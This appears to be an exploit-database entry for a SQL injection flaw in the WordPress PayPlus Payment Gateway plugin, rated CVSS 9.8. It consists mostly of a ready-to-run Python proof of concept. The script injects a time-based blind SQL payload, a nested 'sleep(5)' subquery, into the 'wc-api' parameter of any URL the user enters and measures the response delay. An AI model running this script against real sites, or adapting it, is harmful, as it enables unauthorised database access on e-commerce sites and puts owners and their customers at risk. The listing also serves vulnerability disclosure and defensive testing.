WordPress PayPlus Payment Gateway SQL Injection

2024-08-0700:00:00

j3r1ch0123, github.com

packetstormsecurity.com

135

wordpress

payplus

sql injection

python

exploit

security

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

Confidence

Low

JSON

`#!/usr/bin/env python3.11  
import requests  
import time  
  
def exploit(url):  
payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}  
  
start = time.time()  
with requests.Session() as session:  
session.headers.update({  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'  
})  
response = requests.get(url, params=payload)  
print(f"Exploiting {url}...")  
  
end = time.time()  
print(response.status_code)  
response_time = end - start  
print(f"Response time: {response_time}...")  
  
if __name__ == "__main__":  
url = input("Enter the vulnerable URL (e.g., https://test.site): ")  
if not url.startswith("http"):  
url = "http://" + url  
exploit(url)  
  
`